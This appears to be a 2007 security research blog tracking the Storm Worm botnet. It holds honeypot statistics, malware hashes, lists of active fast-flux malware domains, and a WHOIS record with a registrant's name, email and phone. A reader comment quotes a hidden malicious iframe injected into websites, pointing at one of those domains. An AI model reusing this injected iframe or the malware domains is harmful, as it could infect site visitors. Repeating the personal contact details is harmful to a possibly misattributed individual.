Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either p2p, in DDOS attacks, or spreading 'spa-m-alware' (mostly the later, since our smtp honeypot is setup to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and working to change his sites. SuperLaugh will be spammed using the rouse 'a funny cat e-card.'

Lending an air of credibility to the scam SuperLaugh.com, which is a valid ecard site, also has a file called SuperLaugh.exe which is downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe and has an MD5Sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.

Malware Page:

Legit Page:

(The pages are both animations, the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static html code, the authors are also attaching the Mpack xor'd javascript to the end of their pages. The javascript will attempt to exploit several old vulnerabilities within windows and third party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISP's are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null routing those domains. We're still getting activity on the following domains:

ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com

We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information we believe he launched a JoeJob attack as described in the last blog entry.

We've seen researchers using TOR to capture binaries or communicate with the network, we see denial of service attacks on high profile IP's, probably related to researchers honeypots, and we suspect we've seen a few attempted take over attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second rate script kiddy.

Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with storm's fastflux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note, many IP's have been cleaned already, they are posted here for historical purposes only)

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the storm infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page please close your the browser immediately!

We've updated our stats, click on the links in previous posts for the updated lists of over 18000 unique MD5's, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.